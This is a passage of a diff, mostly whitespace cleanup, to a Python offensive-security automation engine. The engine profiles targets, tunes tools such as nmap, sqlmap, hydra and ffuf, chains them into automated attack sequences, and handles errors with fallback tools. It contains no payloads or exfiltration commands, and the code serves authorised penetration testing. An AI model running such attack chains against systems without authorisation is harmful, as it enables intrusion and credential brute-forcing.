type""" target_lower = target.lower() - + if 'wordpress' in target_lower or 'wp-' in target_lower: return "WordPress" elif 'drupal' in target_lower: return "Drupal" elif 'joomla' in target_lower: return "Joomla" - + return None - + def _calculate_attack_surface(self, profile: TargetProfile) -> float: """Calculate attack surface score based on profile""" score = 0.0 - + # Base score by target type type_scores = { TargetType.WEB_APPLICATION: 7.0, @@ -921,24 +921,24 @@ class IntelligentDecisionEngine: TargetType.CLOUD_SERVICE: 5.0, TargetType.BINARY_FILE: 4.0 } - + score += type_scores.get(profile.target_type, 3.0) - + # Add points for technologies score += len(profile.technologies) * 0.5 - + # Add points for open ports score += len(profile.open_ports) * 0.3 - + # Add points for subdomains score += len(profile.subdomains) * 0.2 - + # CMS adds attack surface if profile.cms_type: score += 1.5 - + return min(score, 10.0) # Cap at 10.0 - + def _determine_risk_level(self, profile: TargetProfile) -> str: """Determine risk level based on attack surface""" if profile.attack_surface_score >= 8.0: @@ -951,11 +951,11 @@ class IntelligentDecisionEngine: return "low" else: return "minimal" - + def _calculate_confidence(self, profile: TargetProfile) -> float: """Calculate confidence score in the analysis""" confidence = 0.5 # Base confidence - + # Increase confidence based on available data if profile.ip_addresses: confidence += 0.1 @@ -965,17 +965,17 @@ class IntelligentDecisionEngine: confidence += 0.1 if 
profile.target_type != TargetType.UNKNOWN: confidence += 0.1 - + return min(confidence, 1.0) - + def select_optimal_tools(self, profile: TargetProfile, objective: str = "comprehensive") -> List[str]: """Select optimal tools based on target profile and objective""" target_type = profile.target_type.value effectiveness_map = self.tool_effectiveness.get(target_type, {}) - + # Get base tools for target type base_tools = list(effectiveness_map.keys()) - + # Apply objective-based filtering if objective == "quick": # Select top 3 most effective tools @@ -990,28 +990,28 @@ class IntelligentDecisionEngine: selected_tools = [tool for tool in base_tools if tool in stealth_tools] else: selected_tools = base_tools - + # Add technology-specific tools for tech in profile.technologies: if tech == TechnologyStack.WORDPRESS and "wpscan" not in selected_tools: selected_tools.append("wpscan") elif tech == TechnologyStack.PHP and "nikto" not in selected_tools: selected_tools.append("nikto") - + return selected_tools - + def optimize_parameters(self, tool: str, profile: TargetProfile, context: Dict[str, Any] = None) -> Dict[str, Any]: """Enhanced parameter optimization with advanced intelligence""" if context is None: context = {} - + # Use advanced parameter optimizer if available if hasattr(self, '_use_advanced_optimizer') and self._use_advanced_optimizer: return parameter_optimizer.optimize_parameters_advanced(tool, profile, context) - + # Fallback to legacy optimization for compatibility optimized_params = {} - + # Tool-specific parameter optimization if tool == "nmap": optimized_params = self._optimize_nmap_params(profile, context) @@ -1056,40 +1056,40 @@ class IntelligentDecisionEngine: else: # Use advanced optimizer for unknown tools return parameter_optimizer.optimize_parameters_advanced(tool, profile, context) - + return optimized_params - + def enable_advanced_optimization(self): """Enable advanced parameter optimization""" self._use_advanced_optimizer = True - + def disable_advanced_optimization(self): """Disable advanced parameter optimization (use legacy)""" self._use_advanced_optimizer = False - + def _optimize_nmap_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Nmap parameters""" params = {"target": profile.target} - + if profile.target_type == TargetType.WEB_APPLICATION: params["scan_type"] = "-sV -sC" params["ports"] = "80,443,8080,8443,8000,9000" elif profile.target_type == TargetType.NETWORK_HOST: params["scan_type"] = "-sS -O" params["additional_args"] = "--top-ports 1000" - + # Adjust timing based on stealth requirements if context.get("stealth", False): params["additional_args"] = params.get("additional_args", "") + " -T2" else: params["additional_args"] = params.get("additional_args", "") + " -T4" - + return params - + def _optimize_gobuster_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Gobuster parameters""" params = {"url": profile.target, "mode": "dir"} - + # Select wordlist based on detected technologies if TechnologyStack.PHP in profile.technologies: params["additional_args"] = "-x php,html,txt,xml" @@ -1099,25 +1099,25 @@ class IntelligentDecisionEngine: params["additional_args"] = "-x jsp,html,txt,xml" else: params["additional_args"] = "-x html,php,txt,js" - + # Adjust threads based on target type if context.get("aggressive", False): params["additional_args"] += " -t 50" else: params["additional_args"] += " -t 20" - + return params - + def _optimize_nuclei_params(self, profile: 
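The "quick" branch of select_optimal_tools above keeps the three highest-rated tools for the target type. The ranking step, isolated as a sketch (the effectiveness numbers here are illustrative, not the table's real values):

```python
effectiveness = {"nmap": 0.90, "nuclei": 0.85, "gobuster": 0.80, "nikto": 0.70}
top3 = sorted(effectiveness, key=effectiveness.get, reverse=True)[:3]
print(top3)  # ['nmap', 'nuclei', 'gobuster']
```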
TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Nuclei parameters""" params = {"target": profile.target} - + # Set severity based on context if context.get("quick", False): params["severity"] = "critical,high" else: params["severity"] = "critical,high,medium" - + # Add technology-specific tags tags = [] for tech in profile.technologies: @@ -1127,16 +1127,16 @@ class IntelligentDecisionEngine: tags.append("drupal") elif tech == TechnologyStack.JOOMLA: tags.append("joomla") - + if tags: params["tags"] = ",".join(tags) - + return params - + def _optimize_sqlmap_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize SQLMap parameters""" params = {"url": profile.target} - + # Add database-specific options based on detected technologies if TechnologyStack.PHP in profile.technologies: params["additional_args"] = "--dbms=mysql --batch" @@ -1144,35 +1144,35 @@ class IntelligentDecisionEngine: params["additional_args"] = "--dbms=mssql --batch" else: params["additional_args"] = "--batch" - + # Adjust aggressiveness if context.get("aggressive", False): params["additional_args"] += " --level=3 --risk=2" - + return params - + def _optimize_ffuf_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize FFuf parameters""" params = {"url": profile.target} - + # Set match codes based on target type if profile.target_type == TargetType.API_ENDPOINT: params["match_codes"] = "200,201,202,204,301,302,401,403" else: params["match_codes"] = "200,204,301,302,307,401,403" - + # Adjust threads if context.get("stealth", False): params["additional_args"] = "-t 10 -p 1" else: params["additional_args"] = "-t 40" - + return params - + def _optimize_hydra_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Hydra parameters""" params = {"target": profile.target} - + # Determine service based on open ports if 22 in profile.open_ports: params["service"] = "ssh" @@ -1182,16 +1182,16 @@ class IntelligentDecisionEngine: params["service"] = "http-get" else: params["service"] = "ssh" # Default - + # Set conservative parameters to avoid lockouts params["additional_args"] = "-t 4 -w 30" - + return params - + def _optimize_rustscan_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Rustscan parameters""" params = {"target": profile.target} - + # Adjust performance based on context if context.get("stealth", False): params["ulimit"] = 1000 @@ -1205,17 +1205,17 @@ class IntelligentDecisionEngine: params["ulimit"] = 5000 params["batch_size"] = 4500 params["timeout"] = 1500 - + # Enable scripts for comprehensive scans if context.get("objective", "normal") == "comprehensive": params["scripts"] = True - + return params - + def _optimize_masscan_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Masscan parameters""" params = {"target": profile.target} - + # Intelligent rate limiting based on target type if context.get("stealth", False): params["rate"] = 100 @@ -1224,17 +1224,17 @@ class IntelligentDecisionEngine: else: # Default intelligent rate params["rate"] = 1000 - + # Enable banners for service detection if context.get("service_detection", True): params["banners"] = True - + return params - + def _optimize_nmap_advanced_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize advanced Nmap parameters""" params = {"target": profile.target} - + # Select scan type based on context if 
context.get("stealth", False): params["scan_type"] = "-sS" @@ -1249,25 +1249,25 @@ class IntelligentDecisionEngine: params["timing"] = "T4" params["os_detection"] = True params["version_detection"] = True - + # Add NSE scripts based on target type if profile.target_type == TargetType.WEB_APPLICATION: params["nse_scripts"] = "http-*,ssl-*" elif profile.target_type == TargetType.NETWORK_HOST: params["nse_scripts"] = "default,discovery,safe" - + return params - + def _optimize_enum4linux_ng_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Enum4linux-ng parameters""" params = {"target": profile.target} - + # Enable comprehensive enumeration by default params["shares"] = True params["users"] = True params["groups"] = True params["policy"] = True - + # Add authentication if available in context if context.get("username"): params["username"] = context["username"] @@ -1275,13 +1275,13 @@ class IntelligentDecisionEngine: params["password"] = context["password"] if context.get("domain"): params["domain"] = context["domain"] - + return params - + def _optimize_autorecon_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize AutoRecon parameters""" params = {"target": profile.target} - + # Adjust scan depth based on objective if context.get("quick", False): params["port_scans"] = "top-100-ports" @@ -1289,16 +1289,16 @@ class IntelligentDecisionEngine: elif context.get("comprehensive", True): params["port_scans"] = "top-1000-ports" params["timeout"] = 600 - + # Set output directory params["output_dir"] = f"/tmp/autorecon_{profile.target.replace('.', '_')}" - + return params - + def _optimize_ghidra_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Ghidra parameters""" params = {"binary": profile.target} - + # Adjust analysis timeout based on context if context.get("quick", False): params["analysis_timeout"] = 120 @@ -1306,17 +1306,17 @@ class IntelligentDecisionEngine: params["analysis_timeout"] = 600 else: params["analysis_timeout"] = 300 - + # Set project name based on binary binary_name = os.path.basename(profile.target).replace('.', '_') params["project_name"] = f"hexstrike_{binary_name}" - + return params - + def _optimize_pwntools_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Pwntools parameters""" params = {"target_binary": profile.target} - + # Set exploit type based on context if context.get("remote_host") and context.get("remote_port"): params["exploit_type"] = "remote" @@ -1324,13 +1324,13 @@ class IntelligentDecisionEngine: params["target_port"] = context["remote_port"] else: params["exploit_type"] = "local" - + return params - + def _optimize_ropper_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Ropper parameters""" params = {"binary": profile.target} - + # Set gadget type and quality based on context if context.get("exploit_type") == "rop": params["gadget_type"] = "rop" @@ -1341,17 +1341,17 @@ class IntelligentDecisionEngine: else: params["gadget_type"] = "all" params["quality"] = 2 - + # Set architecture if known if context.get("arch"): params["arch"] = context["arch"] - + return params - + def _optimize_angr_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize angr parameters""" params = {"binary": profile.target} - + # Set analysis type based on context if context.get("symbolic_execution", True): params["analysis_type"] = "symbolic" 
@@ -1359,56 +1359,56 @@ class IntelligentDecisionEngine: params["analysis_type"] = "cfg" else: params["analysis_type"] = "static" - + # Add find/avoid addresses if provided if context.get("find_address"): params["find_address"] = context["find_address"] if context.get("avoid_addresses"): params["avoid_addresses"] = context["avoid_addresses"] - + return params - + def _optimize_prowler_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Prowler parameters""" params = {"provider": "aws"} - + # Set provider based on context or target analysis if context.get("cloud_provider"): params["provider"] = context["cloud_provider"] - + # Set profile and region if context.get("aws_profile"): params["profile"] = context["aws_profile"] if context.get("aws_region"): params["region"] = context["aws_region"] - + # Set output format and directory params["output_format"] = "json" params["output_dir"] = f"/tmp/prowler_{params['provider']}" - + return params - + def _optimize_scout_suite_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Scout Suite parameters""" params = {"provider": "aws"} - + # Set provider based on context if context.get("cloud_provider"): params["provider"] = context["cloud_provider"] - + # Set profile for AWS if params["provider"] == "aws" and context.get("aws_profile"): params["profile"] = context["aws_profile"] - + # Set report directory params["report_dir"] = f"/tmp/scout-suite_{params['provider']}" - + return params - + def _optimize_kube_hunter_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize kube-hunter parameters""" params = {"report": "json"} - + # Set target based on context if context.get("kubernetes_target"): params["target"] = context["kubernetes_target"] @@ -1416,17 +1416,17 @@ class IntelligentDecisionEngine: params["cidr"] = context["cidr"] elif context.get("interface"): params["interface"] = context["interface"] - + # Enable active hunting if specified if context.get("active_hunting", False): params["active"] = True - + return params - + def _optimize_trivy_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Trivy parameters""" params = {"target": profile.target, "output_format": "json"} - + # Determine scan type based on target if profile.target.startswith(('docker.io/', 'gcr.io/', 'quay.io/')) or ':' in profile.target: params["scan_type"] = "image" @@ -1434,19 +1434,19 @@ class IntelligentDecisionEngine: params["scan_type"] = "fs" else: params["scan_type"] = "image" # Default - + # Set severity filter if context.get("severity"): params["severity"] = context["severity"] else: params["severity"] = "HIGH,CRITICAL" - + return params - + def _optimize_checkov_params(self, profile: TargetProfile, context: Dict[str, Any]) -> Dict[str, Any]: """Optimize Checkov parameters""" params = {"directory": profile.target, "output_format": "json"} - + # Detect framework based on files in directory if context.get("framework"): params["framework"] = context["framework"] @@ -1456,13 +1456,13 @@ class IntelligentDecisionEngine: params["framework"] = "terraform" elif any(f.endswith('.yaml') or f.endswith('.yml') for f in os.listdir(profile.target) if os.path.isfile(os.path.join(profile.target, f))): params["framework"] = "kubernetes" - + return params - + def create_attack_chain(self, profile: TargetProfile, objective: str = "comprehensive") -> AttackChain: """Create an intelligent attack chain based on target profile""" chain = 
AttackChain(profile) - + # Select attack pattern based on target type and objective if profile.target_type == TargetType.WEB_APPLICATION: if objective == "quick": @@ -1502,16 +1502,16 @@ class IntelligentDecisionEngine: pattern = self.attack_patterns["bug_bounty_high_impact"] else: pattern = self.attack_patterns["web_reconnaissance"] - + # Create attack steps for step_config in pattern: tool = step_config["tool"] optimized_params = self.optimize_parameters(tool, profile) - + # Calculate success probability based on tool effectiveness effectiveness = self.tool_effectiveness.get(profile.target_type.value, {}).get(tool, 0.5) success_prob = effectiveness * profile.confidence_score - + # Estimate execution time (simplified) time_estimates = { "nmap": 120, "gobuster": 300, "nuclei": 180, "nikto": 240, @@ -1524,7 +1524,7 @@ class IntelligentDecisionEngine: "docker-bench-security": 180, "falco": 120, "checkov": 240, "terrascan": 200 } exec_time = time_estimates.get(tool, 180) - + step = AttackStep( tool=tool, parameters=optimized_params, @@ -1532,13 +1532,13 @@ class IntelligentDecisionEngine: success_probability=success_prob, execution_time_estimate=exec_time ) - + chain.add_step(step) - + # Calculate overall chain metrics chain.calculate_success_probability() chain.risk_level = profile.risk_level - + return chain # Global decision engine instance @@ -1605,7 +1605,7 @@ class RecoveryStrategy: class IntelligentErrorHandler: """Advanced error handling with automatic recovery strategies""" - + def __init__(self): self.error_patterns = self._initialize_error_patterns() self.recovery_strategies = self._initialize_recovery_strategies() @@ -1613,51 +1613,51 @@ class IntelligentErrorHandler: self.parameter_adjustments = self._initialize_parameter_adjustments() self.error_history = [] self.max_history_size = 1000 - + def _initialize_error_patterns(self) -> Dict[str, ErrorType]: """Initialize error pattern recognition""" return { # Timeout patterns r"timeout|timed out|connection timeout|read timeout": ErrorType.TIMEOUT, r"operation timed out|command timeout": ErrorType.TIMEOUT, - + # Permission patterns r"permission denied|access denied|forbidden|not authorized": ErrorType.PERMISSION_DENIED, r"sudo required|root required|insufficient privileges": ErrorType.PERMISSION_DENIED, - + # Network patterns r"network unreachable|host unreachable|no route to host": ErrorType.NETWORK_UNREACHABLE, r"connection refused|connection reset|network error": ErrorType.NETWORK_UNREACHABLE, - + # Rate limiting patterns r"rate limit|too many requests|throttled|429": ErrorType.RATE_LIMITED, r"request limit exceeded|quota exceeded": ErrorType.RATE_LIMITED, - + # Tool not found patterns r"command not found|no such file or directory|not found": ErrorType.TOOL_NOT_FOUND, r"executable not found|binary not found": ErrorType.TOOL_NOT_FOUND, - + # Parameter patterns r"invalid argument|invalid option|unknown option": ErrorType.INVALID_PARAMETERS, r"bad parameter|invalid parameter|syntax error": ErrorType.INVALID_PARAMETERS, - + # Resource patterns r"out of memory|memory error|disk full|no space left": ErrorType.RESOURCE_EXHAUSTED, r"resource temporarily unavailable|too many open files": ErrorType.RESOURCE_EXHAUSTED, - + # Authentication patterns r"authentication failed|login failed|invalid credentials": ErrorType.AUTHENTICATION_FAILED, r"unauthorized|invalid token|expired token": ErrorType.AUTHENTICATION_FAILED, - + # Target patterns r"target unreachable|target not responding|target down": ErrorType.TARGET_UNREACHABLE, r"host not found|dns 
resolution failed": ErrorType.TARGET_UNREACHABLE, - + # Parsing patterns r"parse error|parsing failed|invalid format|malformed": ErrorType.PARSING_ERROR, r"json decode error|xml parse error|invalid json": ErrorType.PARSING_ERROR } - + def _initialize_recovery_strategies(self) -> Dict[ErrorType, List[RecoveryStrategy]]: """Initialize recovery strategies for different error types""" return { @@ -1868,7 +1868,7 @@ class IntelligentErrorHandler: ) ] } - + def _initialize_tool_alternatives(self) -> Dict[str, List[str]]: """Initialize alternative tools for fallback scenarios""" return { @@ -1876,58 +1876,58 @@ class IntelligentErrorHandler: "nmap": ["rustscan", "masscan", "zmap"], "rustscan": ["nmap", "masscan"], "masscan": ["nmap", "rustscan", "zmap"], - + # Directory/file discovery alternatives "gobuster": ["feroxbuster", "dirsearch", "ffuf", "dirb"], "feroxbuster": ["gobuster", "dirsearch", "ffuf"], "dirsearch": ["gobuster", "feroxbuster", "ffuf"], "ffuf": ["gobuster", "feroxbuster", "dirsearch"], - + # Vulnerability scanning alternatives "nuclei": ["jaeles", "nikto", "w3af"], "jaeles": ["nuclei", "nikto"], "nikto": ["nuclei", "jaeles", "w3af"], - + # Web crawling alternatives "katana": ["gau", "waybackurls", "hakrawler"], "gau": ["katana", "waybackurls", "hakrawler"], "waybackurls": ["gau", "katana", "hakrawler"], - + # Parameter discovery alternatives "arjun": ["paramspider", "x8", "ffuf"], "paramspider": ["arjun", "x8"], "x8": ["arjun", "paramspider"], - + # SQL injection alternatives "sqlmap": ["sqlninja", "jsql-injection"], - + # XSS testing alternatives "dalfox": ["xsser", "xsstrike"], - + # Subdomain enumeration alternatives "subfinder": ["amass", "assetfinder", "findomain"], "amass": ["subfinder", "assetfinder", "findomain"], "assetfinder": ["subfinder", "amass", "findomain"], - + # Cloud security alternatives "prowler": ["scout-suite", "cloudmapper"], "scout-suite": ["prowler", "cloudmapper"], - + # Container security alternatives "trivy": ["clair", "docker-bench-security"], "clair": ["trivy", "docker-bench-security"], - + # Binary analysis alternatives "ghidra": ["radare2", "ida", "binary-ninja"], "radare2": ["ghidra", "objdump", "gdb"], "gdb": ["radare2", "lldb"], - + # Exploitation alternatives "pwntools": ["ropper", "ropgadget"], "ropper": ["ropgadget", "pwntools"], "ropgadget": ["ropper", "pwntools"] } - + def _initialize_parameter_adjustments(self) -> Dict[str, Dict[ErrorType, Dict[str, Any]]]: """Initialize parameter adjustments for different error types and tools""" return { @@ -1957,11 +1957,11 @@ class IntelligentErrorHandler: ErrorType.RESOURCE_EXHAUSTED: {"threads": "5"} } } - + def classify_error(self, error_message: str, exception: Exception = None) -> ErrorType: """Classify error based on message and exception type""" error_text = error_message.lower() - + # Check exception type first if exception: if isinstance(exception, TimeoutError): @@ -1972,19 +1972,19 @@ class IntelligentErrorHandler: return ErrorType.NETWORK_UNREACHABLE elif isinstance(exception, FileNotFoundError): return ErrorType.TOOL_NOT_FOUND - + # Check error patterns for pattern, error_type in self.error_patterns.items(): if re.search(pattern, error_text, re.IGNORECASE): return error_type - + return ErrorType.UNKNOWN - + def handle_tool_failure(self, tool: str, error: Exception, context: Dict[str, Any]) -> RecoveryStrategy: """Determine best recovery action for tool failures""" error_message = str(error) error_type = self.classify_error(error_message, error) - + # Create error context error_context = 
ErrorContext( tool_name=tool, @@ -1997,26 +1997,26 @@ class IntelligentErrorHandler: stack_trace=traceback.format_exc(), system_resources=self._get_system_resources() ) - + # Add to error history self._add_to_history(error_context) - + # Get recovery strategies for this error type strategies = self.recovery_strategies.get(error_type, self.recovery_strategies[ErrorType.UNKNOWN]) - + # Select best strategy based on context best_strategy = self._select_best_strategy(strategies, error_context) - + error_message = f'{error_type.value} - Applying {best_strategy.action.value}' logger.warning(f"{ModernVisualEngine.format_error_card('RECOVERY', tool, error_message)}") - + return best_strategy - + def _select_best_strategy(self, strategies: List[RecoveryStrategy], context: ErrorContext) -> RecoveryStrategy: """Select the best recovery strategy based on context""" # Filter strategies based on attempt count viable_strategies = [s for s in strategies if context.attempt_count <= s.max_attempts] - + if not viable_strategies: # If all strategies exhausted, escalate to human return RecoveryStrategy( @@ -2027,25 +2027,25 @@ class IntelligentErrorHandler: success_probability=0.9, estimated_time=300 ) - + # Score strategies based on success probability and estimated time scored_strategies = [] for strategy in viable_strategies: # Adjust success probability based on previous failures adjusted_probability = strategy.success_probability * (0.9 ** (context.attempt_count - 1)) - + # Prefer strategies with higher success probability and lower time score = adjusted_probability - (strategy.estimated_time / 1000.0) scored_strategies.append((score, strategy)) - + # Return strategy with highest score scored_strategies.sort(key=lambda x: x[0], reverse=True) return scored_strategies[0][1] - + def auto_adjust_parameters(self, tool: str, error_type: ErrorType, original_params: Dict[str, Any]) -> Dict[str, Any]: """Automatically adjust tool parameters based on error patterns""" adjustments = self.parameter_adjustments.get(tool, {}).get(error_type, {}) - + if not adjustments: # Generic adjustments based on error type if error_type == ErrorType.TIMEOUT: @@ -2054,23 +2054,23 @@ class IntelligentErrorHandler: adjustments = {"delay": "2s", "threads": "3"} elif error_type == ErrorType.RESOURCE_EXHAUSTED: adjustments = {"threads": "3", "memory_limit": "1G"} - + # Apply adjustments to original parameters adjusted_params = original_params.copy() adjusted_params.update(adjustments) - + adjustment_info = f'Parameters adjusted: {adjustments}' logger.info(f"{ModernVisualEngine.format_tool_status(tool, 'RECOVERY', adjustment_info)}") - + return adjusted_params - + def get_alternative_tool(self, failed_tool: str, context: Dict[str, Any]) -> Optional[str]: """Get alternative tool for failed tool""" alternatives = self.tool_alternatives.get(failed_tool, []) - + if not alternatives: return None - + # Filter alternatives based on context requirements filtered_alternatives = [] for alt in alternatives: @@ -2079,13 +2079,13 @@ class IntelligentErrorHandler: if context.get('prefer_faster_tools') and alt in ['amass', 'w3af']: continue # Skip slower tools filtered_alternatives.append(alt) - + if not filtered_alternatives: filtered_alternatives = alternatives - + # Return first available alternative return filtered_alternatives[0] if filtered_alternatives else None - + def escalate_to_human(self, context: ErrorContext, urgency: str = "medium") -> Dict[str, Any]: """Escalate complex errors to human operator with full context""" escalation_data = { @@ 
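Strategy selection above decays each candidate's success probability by 10% per prior attempt and subtracts a time penalty, escalating to a human once every strategy's attempt budget is spent. The scoring in isolation (field values are illustrative):

```python
from dataclasses import dataclass

@dataclass
class RecoveryStrategy:
    name: str
    success_probability: float
    estimated_time: int  # seconds
    max_attempts: int = 3

def select_best_strategy(strategies, attempt_count):
    # Strategies whose attempt budget is exhausted are filtered out first.
    viable = [s for s in strategies if attempt_count <= s.max_attempts]
    if not viable:
        return None  # caller escalates to a human operator at this point

    def score(s):
        # Each prior failed attempt decays expected success by 10%.
        adjusted = s.success_probability * (0.9 ** (attempt_count - 1))
        return adjusted - s.estimated_time / 1000.0  # prefer fast strategies

    return max(viable, key=score)

strategies = [RecoveryStrategy("retry_with_backoff", 0.7, 60),
              RecoveryStrategy("switch_tool", 0.6, 300)]
print(select_best_strategy(strategies, attempt_count=2).name)  # retry_with_backoff
```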
-2103,18 +2103,18 @@ class IntelligentErrorHandler: "recent_errors": [e.error_message for e in context.previous_errors[-5:]] } } - + # Log escalation with enhanced formatting logger.error(f"{ModernVisualEngine.format_error_card('CRITICAL', context.tool_name, context.error_message, 'HUMAN ESCALATION REQUIRED')}") logger.error(f"{ModernVisualEngine.format_highlighted_text('ESCALATION DETAILS', 'RED')}") logger.error(f"{json.dumps(escalation_data, indent=2)}") - + return escalation_data - + def _get_human_suggestions(self, context: ErrorContext) -> List[str]: """Get human-readable suggestions for error resolution""" suggestions = [] - + if context.error_type == ErrorType.PERMISSION_DENIED: suggestions.extend([ "Run the command with sudo privileges", @@ -2141,9 +2141,9 @@ class IntelligentErrorHandler: ]) else: suggestions.append("Review error details and logs") - + return suggestions - + def _get_system_resources(self) -> Dict[str, Any]: """Get current system resource information""" try: @@ -2156,32 +2156,32 @@ class IntelligentErrorHandler: } except Exception: return {"error": "Unable to get system resources"} - + def _add_to_history(self, error_context: ErrorContext): """Add error context to history""" self.error_history.append(error_context) - + # Maintain history size limit if len(self.error_history) > self.max_history_size: self.error_history = self.error_history[-self.max_history_size:] - + def get_error_statistics(self) -> Dict[str, Any]: """Get error statistics for monitoring""" if not self.error_history: return {"total_errors": 0} - + error_counts = {} tool_errors = {} recent_errors = [] - + # Count errors by type and tool for error in self.error_history: error_type = error.error_type.value tool = error.tool_name - + error_counts[error_type] = error_counts.get(error_type, 0) + 1 tool_errors[tool] = tool_errors.get(tool, 0) + 1 - + # Recent errors (last hour) if (datetime.now() - error.timestamp).total_seconds() < 3600: recent_errors.append({ @@ -2189,7 +2189,7 @@ class IntelligentErrorHandler: "error_type": error_type, "timestamp": error.timestamp.isoformat() }) - + return { "total_errors": len(self.error_history), "error_counts_by_type": error_counts, @@ -2200,11 +2200,11 @@ class IntelligentErrorHandler: class GracefulDegradation: """Ensure system continues operating even with partial tool failures""" - + def __init__(self): self.fallback_chains = self._initialize_fallback_chains() self.critical_operations = self._initialize_critical_operations() - + def _initialize_fallback_chains(self) -> Dict[str, List[List[str]]]: """Initialize fallback tool chains for critical operations""" return { @@ -2234,30 +2234,30 @@ class GracefulDegradation: ["manual_testing"] # Manual parameter testing ] } - + def _initialize_critical_operations(self) -> Set[str]: """Initialize set of critical operations that must not fail completely""" return { "network_discovery", - "web_discovery", + "web_discovery", "vulnerability_scanning", "subdomain_enumeration" } - + def create_fallback_chain(self, operation: str, failed_tools: List[str] = None) -> List[str]: """Create fallback tool chain for critical operations""" if failed_tools is None: failed_tools = [] - + chains = self.fallback_chains.get(operation, []) - + # Find first chain that doesn't contain failed tools for chain in chains: viable_chain = [tool for tool in chain if tool not in failed_tools] if viable_chain: logger.info(f"๐Ÿ”„ Fallback chain for {operation}: {viable_chain}") return viable_chain - + # If no viable chain found, return basic fallback 
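Degraded operation works through ordered fallback chains, skipping chains whose tools have already failed and bottoming out at a manual step. A self-contained sketch with an abridged chain table (chain contents are illustrative):

```python
FALLBACK_CHAINS = {
    # Ordered from most capable to most basic; entries are illustrative.
    "network_discovery": [["nmap", "masscan"], ["rustscan"], ["ping"]],
    "web_discovery": [["gobuster", "katana"], ["dirsearch"], ["curl"]],
}

def create_fallback_chain(operation, failed_tools=None):
    failed = set(failed_tools or [])
    for chain in FALLBACK_CHAINS.get(operation, []):
        viable = [tool for tool in chain if tool not in failed]
        if viable:
            return viable
    return ["manual_testing"]  # last-resort placeholder step

print(create_fallback_chain("network_discovery", failed_tools=["nmap"]))
# ['masscan'] -- the first chain still has a usable tool
```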
basic_fallbacks = { "network_discovery": ["ping"], @@ -2265,15 +2265,15 @@ class GracefulDegradation: "vulnerability_scanning": ["curl"], "subdomain_enumeration": ["dig"] } - + fallback = basic_fallbacks.get(operation, ["manual_testing"]) logger.warning(f"โš ๏ธ Using basic fallback for {operation}: {fallback}") return fallback - - def handle_partial_failure(self, operation: str, partial_results: Dict[str, Any], + + def handle_partial_failure(self, operation: str, partial_results: Dict[str, Any], failed_components: List[str]) -> Dict[str, Any]: """Handle partial results and fill gaps with alternative methods""" - + enhanced_results = partial_results.copy() enhanced_results["degradation_info"] = { "operation": operation, @@ -2282,36 +2282,36 @@ class GracefulDegradation: "fallback_applied": True, "timestamp": datetime.now().isoformat() } - + # Try to fill gaps based on operation type if operation == "network_discovery" and "open_ports" not in partial_results: # Try basic port check if full scan failed enhanced_results["open_ports"] = self._basic_port_check(partial_results.get("target")) - + elif operation == "web_discovery" and "directories" not in partial_results: # Try basic directory check enhanced_results["directories"] = self._basic_directory_check(partial_results.get("target")) - + elif operation == "vulnerability_scanning" and "vulnerabilities" not in partial_results: # Provide basic security headers check enhanced_results["vulnerabilities"] = self._basic_security_check(partial_results.get("target")) - + # Add recommendations for manual follow-up enhanced_results["manual_recommendations"] = self._get_manual_recommendations( operation, failed_components ) - + logger.info(f"๐Ÿ›ก๏ธ Graceful degradation applied for {operation}") return enhanced_results - + def _basic_port_check(self, target: str) -> List[int]: """Basic port connectivity check""" if not target: return [] - + common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 993, 995] open_ports = [] - + for port in common_ports: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -2322,17 +2322,17 @@ class GracefulDegradation: sock.close() except Exception: continue - + return open_ports - + def _basic_directory_check(self, target: str) -> List[str]: """Basic directory existence check""" if not target: return [] - + common_dirs = ["/admin", "/login", "/api", "/wp-admin", "/phpmyadmin", "/robots.txt"] found_dirs = [] - + for directory in common_dirs: try: url = f"{target.rstrip('/')}{directory}" @@ -2341,20 +2341,20 @@ class GracefulDegradation: found_dirs.append(directory) except Exception: continue - + return found_dirs - + def _basic_security_check(self, target: str) -> List[Dict[str, Any]]: """Basic security headers check""" if not target: return [] - + vulnerabilities = [] - + try: response = requests.get(target, timeout=10) headers = response.headers - + # Check for missing security headers security_headers = { "X-Frame-Options": "Clickjacking protection missing", @@ -2363,7 +2363,7 @@ class GracefulDegradation: "Strict-Transport-Security": "HTTPS enforcement missing", "Content-Security-Policy": "Content Security Policy missing" } - + for header, description in security_headers.items(): if header not in headers: vulnerabilities.append({ @@ -2372,20 +2372,20 @@ class GracefulDegradation: "description": description, "header": header }) - + except Exception as e: vulnerabilities.append({ "type": "connection_error", "severity": "info", "description": f"Could not perform basic security check: {str(e)}" }) - + return 
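The `_basic_security_check` helper shown here degrades vulnerability scanning to a simple response-header inspection. A standalone version of the same idea, assuming the `requests` library the surrounding code already uses (the header list mirrors the hunk):

```python
import requests  # assumed available, as in the surrounding code

SECURITY_HEADERS = {
    "X-Frame-Options": "Clickjacking protection missing",
    "X-Content-Type-Options": "MIME sniffing protection missing",
    "Strict-Transport-Security": "HTTPS enforcement missing",
    "Content-Security-Policy": "Content Security Policy missing",
}

def basic_security_check(target):
    try:
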